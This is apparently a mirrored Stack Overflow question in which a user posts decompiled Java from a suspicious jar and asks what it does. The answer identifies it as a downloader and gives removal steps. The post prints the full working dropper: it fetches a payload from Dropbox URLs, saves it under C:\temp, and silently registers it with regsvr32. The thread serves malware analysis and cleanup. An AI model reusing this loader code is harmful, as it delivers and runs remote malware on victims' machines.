https://stackoverflow.com/questions/23518734
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianIt's downloading a most likely malicious file from dropbox and registering it as a DLL. Exploit is in that file: "C:\temp\YQJHBJX.PWY" unregister it with regsvr32 /u and delete it if it exists.
Please some one explain me the output of this JAVA code DO NOT RUN THIS CODE IT WILL STEAL PASSWORDS [closed]
-
17-07-2023 - |
質問
This is a jar executable file I just obtained. It looks like a some kind of a virus. stealing passwords. I think. but I dont know what it actually do. I decoded it by a software and obtained the code. so can some one please just look at this code (DO NOT RUN IT) and just explain what is actually done in this code?
public static void Run() throws IOException
{
int i = 3;
while (i < 9)
{
Runtime.getRuntime().exec("regsvr32 /s C:\\temp\\YQJHBJX.PWY");
i++;
}
}
public static void main(String[] args) throws Exception
{
new File("C:\\temp\\").mkdir();
File localFile = new File("C:\\temp\\YQJHBJX.PWY");
if (localFile.exists())
{
Run();
}
else
{
String[] arrayOfString1 = "f6pb6ya5e5vc0q5/d.dat?dl=1@@@21urb4zg9n2on4s/d.dat?dl=1".split("@@@");
for (String str1 : arrayOfString1)
{
URL localURL = new URL("https://dl.dropboxusercontent.com/s/" + str1);
HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
localHttpURLConnection.connect();
if (localHttpURLConnection.getResponseCode() / 100 == 2)
{
String str2 = "https://dl.dropboxusercontent.com/s/"+ str1;
String str3 = "C:\\temp\\YQJHBJX.PWY";
goToWeb(str2, str3);
break;
}
}
}
}
public static void goToWeb(String paramString1, String paramString2) throws IOException
{
System.out.println(paramString1);
System.out.println(paramString2);
InputStream localInputStream = URI.create(paramString1).toURL().openStream();
Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);
Run();
}
解決
所属していません StackOverflow
